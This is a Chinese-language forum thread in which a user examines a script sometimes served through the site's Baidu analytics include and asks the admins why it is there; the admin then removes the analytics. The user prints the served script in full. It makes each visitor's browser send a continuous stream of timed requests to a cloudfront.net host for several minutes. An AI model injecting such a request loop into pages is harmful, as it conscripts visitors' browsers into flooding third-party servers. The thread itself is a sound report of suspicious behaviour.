请教这里的管理人员, 论坛要阻挡什麽人进入吗?

Super169

由於近日连接 geek-workshop 出了点问题, 细心研究了一遍这个网站的源码, 发觉有点奇怪的地方.

在论坛的源码(forum.php)中, 有以下的一段:

1. <script type="text/javascript">
   
2. var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
   
3. document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3F5f8d64f479335f9059cacd72ba1019c5' type='text/javascript'%3E%3C/script%3E"));
   
4. </script>

复制代码

当中会加入一个  http://hm.baidu.com/h.js , 而这个 js 有点奇怪, 在某些地方访问它, 结果会是空白的.
但亦有可能接收到以下的一段 javascript.

1. document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'><\/script>");
   
2. !window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'><\/script>");
   
3. startime=new Date().getTime();
   
4. var count = 0;
   
5. 
   
6. function unixtime()
   
7. {
   
8.         var dt = new Date();
   
9.         var ux = Date.UTC(dt.getFullYear(),dt.getMonth(),dt.getDay(),dt.getHours(),dt.getMinutes(),dt.getSeconds())/1000;
   
10.         return ux;
    
11. }
    
12. 
    
13. function get()
    
14. {
    
15.         var ping;
    
16.         $.ajax({
    
17.                         url: "http://d3rkfw22xppori.cloudfront.net/_close?t="+unixtime(),
    
18.                         dataType: "text",
    
19.                         timeout: 10000,
    
20.                         cache:true,
    
21.                         beforeSend : function()
    
22.                         {
    
23.                                 requestTime = new Date().getTime();
    
24.                         },
    
25.                         complete : function()
    
26.                         {
    
27.                                 responseTime = new Date().getTime();
    
28.                                 ping = Math.floor(responseTime-requestTime);                                
    
29.                                 if(responseTime-startime<300000)
    
30.                                 {
    
31.                                         r_send(ping);
    
32.                                         count = count + 1;
    
33.                                 }
    
34.                         }
    
35.                 });
    
36. 
    
37. }
    
38. 
    
39. function r_send(ping)
    
40. {
    
41.         setTimeout("get()", ping);
    
42. }
    
43. setTimeout("get()", 2000);
    

复制代码

如果接收了这段 javascript, 就会不断向  http://d3rkfw22xppori.cloudfront.net 发出请求, 结果都是 No 'Access-Control-Allow-Origin'.  最後在讨论中的 javasript 都不能正常执行.

看似是为了阻挡某些地方的连结似的, 但 geek-workshop 又不像是要对什麽人封锁, 所以想请教管理员, 是否有什麽原因, 要加入这样的封锁?  可否让 geek-workshop 完全开放呢?

弘毅

难道是我装了百度站点统计的原因？我把百度站点统计关了看看

弘毅

已经把百度统计删了。。。。。不知道还有没有这种问题

幻生幻灭

Super169

弘毅 发表于 2015-3-18 00:27
难道是我装了百度站点统计的原因？我把百度站点统计关了看看

oh, 原來是為了 統計之用, 如果是為了計算論壇的流量, 而其他人沒問題的話, 我也不想影響大家.  其實我自己在 hosts table 中把 hm.baidu.com 指向 localhost 127.0.0.1, 已把問題解決了, 只是想了解一下原因.

另外, 也請問 弘毅大大, 如果你直接打開百度那個 h.js 的連結 http://hm.baidu.com/h.js  , 會是空白的, 還是接收到上面那段 javascript?